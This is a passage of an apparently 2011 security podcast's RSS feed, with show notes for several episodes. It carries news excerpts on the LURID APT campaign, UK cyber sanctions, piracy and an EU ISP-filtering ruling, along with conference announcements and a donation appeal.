<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trend Micro</span><a href="http://www.google.com/help/stock_disclaimer.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">threat researchers also witnessed a significant shift from mass compromises to targeted attacks, particularly against large enterprises and government institutions. Their work led them to the uncovering of one of the most notable groups of targeted attacks during the third quarter &ndash; the LURID downloader.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These attacks, which were classified by Trend Micro as advanced persistent threats (APTs), targeted major companies and institutions in over 60 countries, including Russia, Kazakhstan, and the Ukraine. The cybercriminals behind these attacks launched over 300 malware campaigns in order to obtain confidential data from and take full control of affected users&#39; systems over an extended period of time. LURID was successful because it was targeted by its nature. By zoning in on specific geographic locations and entities, LURID compromised as many as 1,465 systems.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.telegraph.co.uk/technology/news/8915245/Criminals-and-cyber-bullies-to-be-banned-from-the-web.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.telegraph.co.uk/technology/news/8915245/Criminals-and-cyber-bullies-to-be-banned-from-the-web.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Criminals who commit offences online and cyber bullies will be banned from the internet as part of the Government&rsquo;s new cyber security strategy, announced today. &nbsp;&nbsp;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> It calls for police and courts to make more use of existing &ldquo;cyber sanctions&rdquo; to restrict access to the social networks and instant messaging services in cases of hacking, fraud and online bullying. Sex offenders and those convicted of harrassment or anti-social behaviour also face more internet restrictions under the new strategy.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Similar orders have been imposed on those charged with involvement in a series of cyber attacks by the Anonymous and LulzSec groups earlier this year, while they await trial.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber sanctions were also used following the riots this summer. Two teenagers in Dundee were banned from the web for inciting riots via Facebook.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials are now looking into whether &quot;cyber tag&quot; technology could be used to monitor offenders and report to authorities if break their bail or sentence conditions by using the internet.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Ministry of Justice and the Home Office will consider and scope the development of a new way of enforcing these orders, using &lsquo;cyber-tags&rsquo; which are triggered by the offender breaching the conditions that have been put on their internet use, and which will automatically inform the police or probation service,&quot; cyber security strategy said. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://torrentfreak.com/mpaa-costs-hollywood-more-than-us-bittorrent-piracy-111122/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://torrentfreak.com/mpaa-costs-hollywood-more-than-us-bittorrent-piracy-111122/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During the last year Netflix managed to outgrow BitTorrent in terms of the amount of US Internet traffic it generates. A promising finding for Hollywood as it shows that there&rsquo;s an overwhelming interest for the legal movie streaming service. At TorrentFreak we wondered what might happen if all US BitTorrent users made the switch to Netflix, and the results of this exploration are quite intriguing.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The movie industry claims that piracy is costing them billions of dollars a year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Luckily for Hollywood, many Americans choose to consume their online media through legal services such as Netflix. In fact, there are now so many that the total Internet traffic generated by Netflix has outgrown that of BitTorrent.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This made us wonder &ndash; what would happen if all movie-downloading BitTorrent users made the switch to Netflix? What if movie piracy via BitTorrent disappeared?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Before we crunch some numbers we have to say that the model we use relies on a lot of assumptions. However, we try to keep these in favor of the movie industry to maximize their potential &lsquo;profits&rsquo;. We obviously chose Netflix as a BitTorrent replacement because it comes closest to what &lsquo;pirates&rsquo; want. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techcrunch.com/2011/11/24/eu-court-rules-isps-cant-be-forced-to-filter-out-illegal-content/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2011/11/24/eu-court-rules-isps-cant-be-forced-to-filter-out-illegal-content/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The European Court of Justice this morning ruled that content owners can not strong-arm Internet service providers (ISPs) into filtering out copyright-infringing content.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This case has its origin in a dispute between ISP Scarlet and SABAM, a Belgian management company responsible for authorizing the use by third parties of the musical works of authors, composers and editors. In 2004, the right-holders group established that users of Scarlet&rsquo;s services were downloading such musical works from its catalogue by means of peer-to-peer (p2p) file-sharing networks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Belgium&rsquo;s Court of First Instance ordered Scarlet, on pain of a periodic penalty, to bring those copyright infringements to an end by making it impossible for its customers to send or receive in any way electronic files &ndash; a filter, in other words. Scarlet appealed the decision, claiming the ruling was incompatible with EU law as well as the e-Commerce Directive.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Indeed, EU law says national authorities must not adopt measures which would require an ISP to carry out general monitoring &ndash; let alone filtering &ndash; of the information that it transmits on its network.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-534-deceived-hacker-15-years-for-1-click-we%e2%80%99re-no-1-banned-in-the-uk-cure-worse-than-the-disease-and-eu-isp%e2%80%99s-aren%e2%80%99t-content-police/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3215/0/infosec-daily-podcast-episode-534.mp3" length="22267965" type="audio/mpeg" />
		<itunes:duration>0:46:21</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 534 for November 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Keith Pachulski.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka the[...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 534 for November 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Keith Pachulski.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: 
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.networkworld.com/news/2011/112411-hungarian-hacks-marriotts-systems-to-253458.html
	A Hungarian citizen has pleaded guilty to stealing confidential information from the computers of Marriott International, and threatening to reveal the information if the hotel chain did not offer him a job maintaining the company&#39;s computers, the Department of Justice said on Wednesday.
	Attila Nemeth, 26, pleaded guilty in the District of Maryland before U.S. District Judge J. Frederick Motz, according to a statement by DOJ. He was detained after he traveled to the U.S. on a ticket purchased by Marriott for a fictitious job interview.
	Nemeth is said to have admitted that he used an infected email attachment sent to some Marriott employees to install malicious software on the company&#39;s system that gave him a &#34;backdoor&#34; access to proprietary email and other files.
	Nemeth sent an email to Marriott staff on Nov. 11 last year, informing them that he had been accessing Marriott&#39;s computers for months and had obtained proprietary information, according to Nemeth&#39;s plea agreement. He threatened to reveal the information if Marriott did not give him a job maintaining the company&#39;s computers. 
	&#8230;
	Source: http://www.smh.com.au/world/thai-crackdown-on-facebook-remarks-on-king-20111125-1nz1t.html
	Thailand has warned users of Facebook that they could face prosecution under harsh lese-majeste laws if they press &#39;&#39;share&#39;&#39; or &#39;&#39;like&#39;&#39; on images or articles considered unflattering to the Thai monarchy.
	The prosecution of a Thai-born US citizen who has pleaded guilty to translating a banned biography of King Bhumibol Adulyadej has signalled that authorities are also targeting lese-majeste offences committed overseas.
	Thailand&#39;s Information and Communications Technology Minister, Anudith Nakornthap, says that even though Facebook clicks of &#39;&#39;like&#39;&#39; or &#39;&#39;share&#39;&#39; are only done to show support for messages, they could violate laws that carry sentences of three to 15 years jail for each charge.
	&#8230;
	Source: http://www.echannelline.com/usa/brief.cfm?item=18717
	Google replaced Microsoft as the number one vendor for reported vulnerabilities, with a total of 82, due to existing vulnerabilities in Chrome as the browser grows in popularity. Oracle came in second, with 63[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 533 &#8211; Interview with Thomas Ryan</title>
		<link>http://www.isdpodcast.com/episode-533-interview-with-thomas-ryan</link>
		<comments>http://www.isdpodcast.com/episode-533-interview-with-thomas-ryan#comments</comments>
		<pubDate>Wed, 30 Nov 2011 02:33:04 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3211</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 533 for November 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 533 for November 29, 2011. &nbsp;Tonight&#39;s podcast is hosted by </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes &amp; Dan Houser (@1cissp on twitter)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: </span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We have an interesting discussion with Thomas Ryan. &nbsp;Thomas is the creator of Robin Sage (http://en.wikipedia.org/wiki/Robin_Sage).&nbsp; <br />
	</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-533-interview-with-thomas-ryan/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3211/0/infosec-daily-podcast-episode-533.mp3" length="26072230" type="audio/mpeg" />
		<itunes:duration>0:54:16</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 533 for November 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 533 for November 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes &#38; Dan Houser (@1cissp on twitter)
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: 
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	We have an interesting discussion with Thomas Ryan. &#160;Thomas is the creator of Robin Sage (http://en.wikipedia.org/wiki/Robin_Sage).&#160; 
	</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 532 &#8211; Live from SecurityZone 2011</title>
		<link>http://www.isdpodcast.com/episode-532-live-from-securityzone-2011</link>
		<comments>http://www.isdpodcast.com/episode-532-live-from-securityzone-2011#comments</comments>
		<pubDate>Tue, 29 Nov 2011 02:24:11 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3205</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 532 for November 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 532 for November 28, 2011. &nbsp;Tonight&#39;s podcast is hosted by </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes &amp; Dan Houser (@1cissp on twitter)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
